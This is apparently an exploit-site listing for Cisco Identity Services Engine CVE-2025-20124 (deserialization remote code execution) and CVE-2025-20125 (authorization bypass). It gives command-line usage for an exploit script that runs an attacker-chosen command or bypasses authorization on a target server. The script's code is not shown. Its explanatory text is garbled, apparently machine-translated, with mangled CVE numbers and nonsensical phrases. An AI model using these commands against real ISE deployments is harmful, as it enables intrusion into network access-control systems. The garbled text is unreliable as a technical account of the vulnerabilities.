Exploit for Deserialization of Untrusted Data in Cisco Identity_Services_Engine CVE-2025-20124 CVE-2025-20125

Name: Exploit for Deserialization of Untrusted Data in Cisco Identity_Services_Engine CVE-2025-20124 CVE-2025-20125
Rating: 5 (165 reviews)

2025-06-16 | CVSS 9.9

## https://sploitus.com/exploit?id=82E8F9DF-AF6E-57BA-8419-D00A4EDA93CB
## 🗒️ How to use ##

- ## cve‑20124 (RCE): ##

> python3 Exploit.py --url https://ise.example.com 
--Session your_ISE_Session_Token --DESER-CMD "Touch /TMP /PWWNED"

- ## cve‑20125 (authorized bypass): ## 

>python3 Exploit.py --url https://ise.example.com 
--Session your_ISE_Session_Token --Bbypass

- ⚠️ Important note
Both drive require an ISE administrator to log in (the administrator only read is enough)

- This is only an example; In the actual  you need:

> The Java utility chain is true to sequentially self -transparent CVE‑201224.

> Final score authentication (using assumption/API/V1/Admin/*).


🔍 Reference source
Cisco ADVISORY CVE‑20124 & Cve‑20125 - Receive RCE level & ignore the required authentication.